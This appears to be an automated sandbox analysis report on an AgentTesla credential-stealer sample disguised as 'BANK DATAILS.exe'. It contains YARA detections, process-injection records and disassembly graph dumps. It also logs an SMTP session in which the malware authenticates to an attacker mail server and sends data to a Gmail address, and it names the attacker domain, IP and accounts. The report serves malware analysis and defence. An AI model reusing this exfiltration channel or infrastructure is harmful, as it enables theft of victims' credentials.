                                                                                  Aug 5, 2022 13:24:47.099961996 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:47.100821018 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:47.100944042 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:47.101768017 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:47.101867914 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:47.235477924 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:47.235764980 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:47.241832972 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:47.358130932 CEST49737587192.168.2.3103.195.185.58
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Aug 5, 2022 13:24:44.114614964 CEST5820453192.168.2.38.8.8.8
                                                                                  Aug 5, 2022 13:24:44.500737906 CEST53582048.8.8.8192.168.2.3
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Aug 5, 2022 13:24:44.114614964 CEST192.168.2.38.8.8.80xa87cStandard query (0)webmail.keeprojects.inA (IP address)IN (0x0001)
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Aug 5, 2022 13:24:44.500737906 CEST8.8.8.8192.168.2.30xa87cNo error (0)webmail.keeprojects.in103.195.185.58A (IP address)IN (0x0001)
                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Aug 5, 2022 13:24:45.731394053 CEST58749737103.195.185.58192.168.2.3220-md-in-88.webhostbox.net ESMTP Exim 4.95 #2 Fri, 05 Aug 2022 11:24:45 +0000
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Aug 5, 2022 13:24:45.731714964 CEST49737587192.168.2.3103.195.185.58EHLO 813435
                                                                                  Aug 5, 2022 13:24:45.869232893 CEST58749737103.195.185.58192.168.2.3250-md-in-88.webhostbox.net Hello 813435 [102.129.143.3]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Aug 5, 2022 13:24:45.870805979 CEST49737587192.168.2.3103.195.185.58AUTH login cXVhbGl0eUBrZWVwcm9qZWN0cy5pbg==
                                                                                  Aug 5, 2022 13:24:46.004103899 CEST58749737103.195.185.58192.168.2.3334 UGFzc3dvcmQ6
                                                                                  Aug 5, 2022 13:24:46.662942886 CEST58749737103.195.185.58192.168.2.3235 Authentication succeeded
                                                                                  Aug 5, 2022 13:24:46.663623095 CEST49737587192.168.2.3103.195.185.58MAIL FROM:<quality@keeprojects.in>
                                                                                  Aug 5, 2022 13:24:46.796494007 CEST58749737103.195.185.58192.168.2.3250 OK
                                                                                  Aug 5, 2022 13:24:46.796808004 CEST49737587192.168.2.3103.195.185.58RCPT TO:<uuc7470@gmail.com>
                                                                                  Aug 5, 2022 13:24:46.966094017 CEST58749737103.195.185.58192.168.2.3250 Accepted
                                                                                  Aug 5, 2022 13:24:46.966377974 CEST49737587192.168.2.3103.195.185.58DATA
                                                                                  Aug 5, 2022 13:24:47.099961996 CEST58749737103.195.185.58192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                  Aug 5, 2022 13:24:47.101867914 CEST49737587192.168.2.3103.195.185.58.
                                                                                  Aug 5, 2022 13:24:47.241832972 CEST58749737103.195.185.58192.168.2.3250 OK id=1oJvRf-004L0Y-0K

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:13:24:06
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\BANK DATAILS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\BANK DATAILS.exe"
                                                                                  Imagebase:0x550000
                                                                                  File size:845312 bytes
                                                                                  MD5 hash:9C8721D5F0DFCB5893766810FC016B1B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:4
                                                                                  Start time:13:24:24
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:{path}
                                                                                  Imagebase:0x3a0000
                                                                                  File size:261728 bytes
                                                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:5
                                                                                  Start time:13:24:25
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:{path}
                                                                                  Imagebase:0x2c0000
                                                                                  File size:261728 bytes
                                                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:6
                                                                                  Start time:13:24:26
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:{path}
                                                                                  Imagebase:0xd20000
                                                                                  File size:261728 bytes
                                                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:93
                                                                                    Total number of Limit Nodes:6
                                                                                    execution_graph 15302 f49bd0 15306 f49cc8 15302->15306 15314 f49cb8 15302->15314 15303 f49bdf 15307 f49cdb 15306->15307 15308 f49cf3 15307->15308 15322 f49f50 15307->15322 15326 f49f40 15307->15326 15308->15303 15309 f49ceb 15309->15308 15310 f49ef0 GetModuleHandleW 15309->15310 15311 f49f1d 15310->15311 15311->15303 15315 f49cbc 15314->15315 15316 f49cf3 15315->15316 15320 f49f50 LoadLibraryExW 15315->15320 15321 f49f40 LoadLibraryExW 15315->15321 15316->15303 15317 f49ceb 15317->15316 15318 f49ef0 GetModuleHandleW 15317->15318 15319 f49f1d 15318->15319 15319->15303 15320->15317 15321->15317 15324 f49f54 15322->15324 15323 f49f89 15323->15309 15324->15323 15330 f49048 15324->15330 15328 f49f50 15326->15328 15327 f49f89 15327->15309 15328->15327 15329 f49048 LoadLibraryExW 15328->15329 15329->15327 15331 f4a130 LoadLibraryExW 15330->15331 15333 f4a1a9 15331->15333 15333->15323 15334 f47030 15335 f4704a 15334->15335 15338 f46c40 15335->15338 15337 f4705c 15339 f46c4b 15338->15339 15342 f46c70 15339->15342 15341 f4717d 15341->15337 15343 f46c7b 15342->15343 15346 f46ca0 15343->15346 15345 f4725a 15345->15341 15347 f46cab 15346->15347 15350 f46cd0 15347->15350 15349 f4734a 15349->15345 15351 f46cdb 15350->15351 15352 f47a9c 15351->15352 15355 f4bce8 15351->15355 15360 f4bcd8 15351->15360 15352->15349 15357 f4bcec 15355->15357 15356 f4bd2d 15356->15352 15357->15356 15365 f4be98 15357->15365 15369 f4be88 15357->15369 15361 f4bcdc 15360->15361 15362 f4bd2d 15361->15362 15363 f4be98 2 API calls 15361->15363 15364 f4be88 2 API calls 15361->15364 15362->15352 15363->15362 15364->15362 15366 f4be9c 15365->15366 15367 f4bedf 15366->15367 15373 f4a9cc 15366->15373 15367->15356 15370 f4be98 15369->15370 15371 f4bedf 15370->15371 15372 f4a9cc 2 API calls 15370->15372 15371->15356 15372->15371 15374 f4a9d7 15373->15374 15376 f4cbd8 15374->15376 15377 f4c1e4 15374->15377 15376->15376 15378 f4c1ef 15377->15378 15379 f46cd0 2 API calls 15378->15379 15380 f4cc47 15379->15380 15384 f4e9b8 15380->15384 15389 f4e9d0 15380->15389 15381 f4cc80 15381->15376 15385 f4e9c4 15384->15385 15386 f4ea0d 15385->15386 15395 f4ed18 15385->15395 15399 f4ed08 15385->15399 15386->15381 15391 f4ea01 15389->15391 15392 f4ea4e 15389->15392 15390 f4ea0d 15390->15381 15391->15390 15393 f4ed18 2 API calls 15391->15393 15394 f4ed08 2 API calls 15391->15394 15392->15381 15393->15392 15394->15392 15396 f4ed1c 15395->15396 15397 f49cc8 LoadLibraryExW GetModuleHandleW 15396->15397 15398 f4ed21 15397->15398 15398->15386 15400 f4ed0c 15399->15400 15401 f49cc8 LoadLibraryExW GetModuleHandleW 15400->15401 15402 f4ed21 15401->15402 15402->15386 15403 f4bfb0 15404 f4c016 15403->15404 15408 f4c578 15404->15408 15412 f4c568 15404->15412 15405 f4c0c5 15409 f4c57c 15408->15409 15416 f4aa2c 15409->15416 15413 f4c578 15412->15413 15414 f4aa2c DuplicateHandle 15413->15414 15415 f4c5a6 15414->15415 15415->15405 15417 f4c5e0 DuplicateHandle 15416->15417 15419 f4c5a6 15417->15419 15419->15405

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 55 f44a10-f44a3e 56 f44a45-f44a7e 55->56 57 f44a40 55->57 58 f44a7f 56->58 57->56 59 f44a86-f44aa2 58->59 60 f44aa4 59->60 61 f44aab-f44aac 59->61 60->58 60->61 62 f44b17-f44b1b 60->62 63 f44e10-f44e20 60->63 64 f44b71-f44b9a 60->64 65 f44ab1-f44ade 60->65 66 f44cb2-f44cb6 60->66 67 f44c73-f44c7c 60->67 68 f44d5d-f44d86 60->68 69 f44ddf-f44de0 60->69 70 f44cf8-f44d41 60->70 71 f44b38-f44b3c 60->71 72 f44b59-f44b6c 60->72 73 f44bfa-f44c5a 60->73 74 f44c65-f44c6e 60->74 75 f44d46-f44d58 60->75 76 f44ae0-f44ae4 60->76 77 f44c81-f44c95 call f44378 60->77 78 f44e61-f44ffd 60->78 79 f44de1 60->79 80 f44be2-f44bf5 60->80 61->69 90 f44b21-f44b33 62->90 91 f450aa 62->91 83 f44e31 63->83 84 f44e22-f44e2f 63->84 114 f44ba4 64->114 115 f44b9c-f44ba2 64->115 65->59 85 f44ccf-f44cd9 66->85 86 f44cb8-f44ccd 66->86 67->59 117 f44d90 68->117 118 f44d88-f44d8e 68->118 69->79 70->59 81 f44c97 71->81 82 f44b42-f44b54 71->82 72->59 73->74 74->59 75->59 88 f44ae6-f44af5 76->88 89 f44af7-f44afe 76->89 94 f44c9e-f44cad 77->94 99 f44ffe 78->99 93 f44de8-f44e04 79->93 80->59 81->94 82->59 97 f44e34 83->97 84->97 96 f44ce3-f44cf3 85->96 86->96 103 f44b05-f44b12 88->103 89->103 90->59 104 f450ab 91->104 106 f44e06 93->106 107 f44e0d-f44e0e 93->107 94->59 96->59 123 f44e3b-f44e5f 97->123 116 f45005-f45021 99->116 103->59 119 f450b2-f450ce 104->119 106->63 106->78 106->79 106->99 106->104 106->107 108 f45114-f45120 106->108 109 f450a7 106->109 110 f45100-f45112 106->110 111 f450e3-f450fe 106->111 112 f4502d-f45056 106->112 107->78 109->91 110->119 111->119 132 f45060 112->132 133 f45058-f4505e 112->133 122 f44ba7-f44bdd 114->122 115->122 125 f45023 116->125 126 f4502a-f4502b 116->126 128 f44d93-f44dda 117->128 118->128 120 f450e0-f450e1 119->120 121 f450d0 119->121 120->108 121->104 121->108 121->110 121->111 121->120 122->59 123->93 125->99 125->104 125->108 125->109 125->110 125->111 125->112 125->126 126->109 128->59 136 f45063-f450a2 132->136 133->136 136->116
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Mz`.$X.?+$X.?+
                                                                                    • API String ID: 0-4146211559
                                                                                    • Opcode ID: 914fee5dbc3b56af21bb6c1b44f0045904ee5fb5da063561efa241f139748efb
                                                                                    • Instruction ID: 02b30d65e98ebee8be3be6726a7efb0f4b366163d47274d1ffd1be1c4dc48321
                                                                                    • Opcode Fuzzy Hash: 914fee5dbc3b56af21bb6c1b44f0045904ee5fb5da063561efa241f139748efb
                                                                                    • Instruction Fuzzy Hash: 13F14974E04209DFCB14CFA5D580B9DBBB2EF89310F2094AAD509BB360EB34A985DF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 147 f44a06-f44a3e 149 f44a45-f44a7e 147->149 150 f44a40 147->150 151 f44a7f 149->151 150->149 152 f44a86-f44aa2 151->152 153 f44aa4 152->153 154 f44aab-f44aac 152->154 153->151 153->154 155 f44b17-f44b1b 153->155 156 f44e10-f44e20 153->156 157 f44b71-f44b9a 153->157 158 f44ab1-f44ade 153->158 159 f44cb2-f44cb6 153->159 160 f44c73-f44c7c 153->160 161 f44d5d-f44d86 153->161 162 f44ddf-f44de0 153->162 163 f44cf8-f44d41 153->163 164 f44b38-f44b3c 153->164 165 f44b59-f44b6c 153->165 166 f44bfa-f44c5a 153->166 167 f44c65-f44c6e 153->167 168 f44d46-f44d58 153->168 169 f44ae0-f44ae4 153->169 170 f44c81-f44c95 call f44378 153->170 171 f44e61-f44ffd 153->171 172 f44de1 153->172 173 f44be2-f44bf5 153->173 154->162 183 f44b21-f44b33 155->183 184 f450aa 155->184 176 f44e31 156->176 177 f44e22-f44e2f 156->177 207 f44ba4 157->207 208 f44b9c-f44ba2 157->208 158->152 178 f44ccf-f44cd9 159->178 179 f44cb8-f44ccd 159->179 160->152 210 f44d90 161->210 211 f44d88-f44d8e 161->211 162->172 163->152 174 f44c97 164->174 175 f44b42-f44b54 164->175 165->152 166->167 167->152 168->152 181 f44ae6-f44af5 169->181 182 f44af7-f44afe 169->182 187 f44c9e-f44cad 170->187 192 f44ffe 171->192 186 f44de8-f44e04 172->186 173->152 174->187 175->152 190 f44e34 176->190 177->190 189 f44ce3-f44cf3 178->189 179->189 196 f44b05-f44b12 181->196 182->196 183->152 197 f450ab 184->197 199 f44e06 186->199 200 f44e0d-f44e0e 186->200 187->152 189->152 216 f44e3b-f44e5f 190->216 209 f45005-f45021 192->209 196->152 212 f450b2-f450ce 197->212 199->156 199->171 199->172 199->192 199->197 199->200 201 f45114-f45120 199->201 202 f450a7 199->202 203 f45100-f45112 199->203 204 f450e3-f450fe 199->204 205 f4502d-f45056 199->205 200->171 202->184 203->212 204->212 225 f45060 205->225 226 f45058-f4505e 205->226 215 f44ba7-f44bdd 207->215 208->215 218 f45023 209->218 219 f4502a-f4502b 209->219 221 f44d93-f44dda 210->221 211->221 213 f450e0-f450e1 212->213 214 f450d0 212->214 213->201 214->197 214->201 214->203 214->204 214->213 215->152 216->186 218->192 218->197 218->201 218->202 218->203 218->204 218->205 218->219 219->202 221->152 229 f45063-f450a2 225->229 226->229 229->209
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Mz`.$X.?+
                                                                                    • API String ID: 0-3189588762
                                                                                    • Opcode ID: fef6b4b63c3141f755457a47dc169d494eb0d8eb647be9fb05b6296bd4c60a8d
                                                                                    • Instruction ID: a5b3dd3c1a0ca692880b32f845d8501c4901923cdd573af244d60fe6ea0d3339
                                                                                    • Opcode Fuzzy Hash: fef6b4b63c3141f755457a47dc169d494eb0d8eb647be9fb05b6296bd4c60a8d
                                                                                    • Instruction Fuzzy Hash: 9BF14874E00209DFCB14CFA5D480B9DBBB1EF89310F2494AAD509BB364EB34A985DF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 f49cc8-f49cdd call f48fe4 3 f49cf3-f49cf7 0->3 4 f49cdf 0->4 5 f49cf9-f49d03 3->5 6 f49d0b-f49d4c 3->6 53 f49ce5 call f49f50 4->53 54 f49ce5 call f49f40 4->54 5->6 11 f49d4e-f49d56 6->11 12 f49d59-f49d67 6->12 7 f49ceb-f49ced 7->3 9 f49e28-f49ee8 7->9 48 f49ef0-f49f1b GetModuleHandleW 9->48 49 f49eea-f49eed 9->49 11->12 14 f49d69-f49d6e 12->14 15 f49d8b-f49d8d 12->15 16 f49d70-f49d77 call f48ff0 14->16 17 f49d79 14->17 18 f49d90-f49d97 15->18 21 f49d7b-f49d89 16->21 17->21 22 f49da4-f49dab 18->22 23 f49d99-f49da1 18->23 21->18 25 f49dad-f49db5 22->25 26 f49db8-f49dc1 call f49000 22->26 23->22 25->26 30 f49dc3-f49dcb 26->30 31 f49dce-f49dd3 26->31 30->31 33 f49dd5-f49ddc 31->33 34 f49df1-f49dfe 31->34 33->34 35 f49dde-f49dee call f49010 call f49020 33->35 41 f49e00-f49e1e 34->41 42 f49e21-f49e27 34->42 35->34 41->42 50 f49f24-f49f38 48->50 51 f49f1d-f49f23 48->51 49->48 51->50 53->7 54->7
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F49F0E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID: pO$pO
                                                                                    • API String ID: 4139908857-2202279484
                                                                                    • Opcode ID: e408a981f953743246f33ba18827f98de669cec7650631ed49e42c231293b82d
                                                                                    • Instruction ID: 57aa74dbdfeb2577ca77159e9d78bcaa17a089ef6a85f0e14738527e0b964543
                                                                                    • Opcode Fuzzy Hash: e408a981f953743246f33ba18827f98de669cec7650631ed49e42c231293b82d
                                                                                    • Instruction Fuzzy Hash: C0712470A00B058FD724DF2AD48579BBBF1FF88314F008929D89AD7A44E775E94ACB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 295 f4aa2c-f4c674 DuplicateHandle 298 f4c676-f4c67c 295->298 299 f4c67d-f4c69a 295->299 298->299
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F4C5A6,?,?,?,?,?), ref: 00F4C667
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 0ec7a83f2fc7c806bb8568f91e6f5aafaabf981fdd55a60b1c6afa9862637d62
                                                                                    • Instruction ID: 79b7db7096dd99fbee1a7488e33bd9d5c2485d3601c195db589907af51f28667
                                                                                    • Opcode Fuzzy Hash: 0ec7a83f2fc7c806bb8568f91e6f5aafaabf981fdd55a60b1c6afa9862637d62
                                                                                    • Instruction Fuzzy Hash: ED21E4B5D01208AFDB11CFAAD985BDEBFF4EB48324F14841AE918A3710D374A944DFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 302 f4c5d9-f4c5de 303 f4c5e4-f4c674 DuplicateHandle 302->303 304 f4c5e0-f4c5e3 302->304 305 f4c676-f4c67c 303->305 306 f4c67d-f4c69a 303->306 304->303 305->306
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F4C5A6,?,?,?,?,?), ref: 00F4C667
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 21eedc58f925989ce89137a51e1a30839c09f232c08b5f6085f7ba39b8d9027a
                                                                                    • Instruction ID: a3a49d1e349061b404b54f0cc9a56540a5537cbdd801bae8379d902ea2803418
                                                                                    • Opcode Fuzzy Hash: 21eedc58f925989ce89137a51e1a30839c09f232c08b5f6085f7ba39b8d9027a
                                                                                    • Instruction Fuzzy Hash: 2E21E4B5D012189FDB10CFAAD984ADEBFF4EB48324F14841AE918A3310D374A944DFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 309 f4a128-f4a12a 310 f4a130-f4a133 309->310 311 f4a12c-f4a12e 309->311 312 f4a134-f4a170 310->312 311->310 311->312 313 f4a172-f4a175 312->313 314 f4a178-f4a1a7 LoadLibraryExW 312->314 313->314 315 f4a1b0-f4a1cd 314->315 316 f4a1a9-f4a1af 314->316 316->315
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49F89,00000800,00000000,00000000), ref: 00F4A19A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: a177b72899f8d321619c5bdb106e5972e1ca9249bd026ed6ab0548d3df97ba6e
                                                                                    • Instruction ID: be5b3e696656a4a9897da6437640c5c38b16fc6f6d07931d7e8e21fa7c95dedb
                                                                                    • Opcode Fuzzy Hash: a177b72899f8d321619c5bdb106e5972e1ca9249bd026ed6ab0548d3df97ba6e
                                                                                    • Instruction Fuzzy Hash: 112106B6C002499FDB21CFAAC484BDEFFF4EB88324F04842AD915A7600D375A945CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 319 f49048-f4a170 322 f4a172-f4a175 319->322 323 f4a178-f4a1a7 LoadLibraryExW 319->323 322->323 324 f4a1b0-f4a1cd 323->324 325 f4a1a9-f4a1af 323->325 325->324
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49F89,00000800,00000000,00000000), ref: 00F4A19A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 5ff803b49dd0ccfdbe95635557e1e0ff909148010548bafe68ffb2dccfb78e18
                                                                                    • Instruction ID: b52c1889cd6ec803721a62a31616ae83c1e6fc4d8579333d5013e0c2464f780b
                                                                                    • Opcode Fuzzy Hash: 5ff803b49dd0ccfdbe95635557e1e0ff909148010548bafe68ffb2dccfb78e18
                                                                                    • Instruction Fuzzy Hash: 3B11E2B6D002099FDB10CF9AD844BDEFBF4EB88324F14842AE919A7700D375A945CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 328 f49ea8-f49ee8 329 f49ef0-f49f1b GetModuleHandleW 328->329 330 f49eea-f49eed 328->330 331 f49f24-f49f38 329->331 332 f49f1d-f49f23 329->332 330->329 332->331
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F49F0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 3649754af1af5a19855ba4afeb9f1447b6ec9021e53750f3a96b3438897cb35f
                                                                                    • Instruction ID: b874e6747b19523014f3baf2551c94188f2f799dedab54ea4559739553859d64
                                                                                    • Opcode Fuzzy Hash: 3649754af1af5a19855ba4afeb9f1447b6ec9021e53750f3a96b3438897cb35f
                                                                                    • Instruction Fuzzy Hash: 9C11E3B6D006598FCB10CF9AD444BDFFBF4EB48324F14851AD819A7600D3B5A945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289037599.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_edd000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c9944b26c50c9126d1d3e319719c116f70328fe7b589a087cb0c0304a588b638
                                                                                    • Instruction ID: a115864042ce1264d4f4ddb84c70fbaa103316e141e3146589ef90cbd969a5c3
                                                                                    • Opcode Fuzzy Hash: c9944b26c50c9126d1d3e319719c116f70328fe7b589a087cb0c0304a588b638
                                                                                    • Instruction Fuzzy Hash: EF210371508240EFCB05DF14DDC0B66BB65FB98328F24C56AE8091B746C336E856D7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289094509.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_eed000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a299cae6705bf4ba0757b93e6c56f2326e41a6dd227d63508670b2d27c2a672c
                                                                                    • Instruction ID: 2be5d2fa2f9394b3741edd263f555de4d00bae62d7c1653c4aaefa1939dea2f9
                                                                                    • Opcode Fuzzy Hash: a299cae6705bf4ba0757b93e6c56f2326e41a6dd227d63508670b2d27c2a672c
                                                                                    • Instruction Fuzzy Hash: 2A213471608288DFCB14CF14DDC0B56BB66FB88318F28C96DD80A5B746C336D84BCAA1
                                                                                    Uniqueness

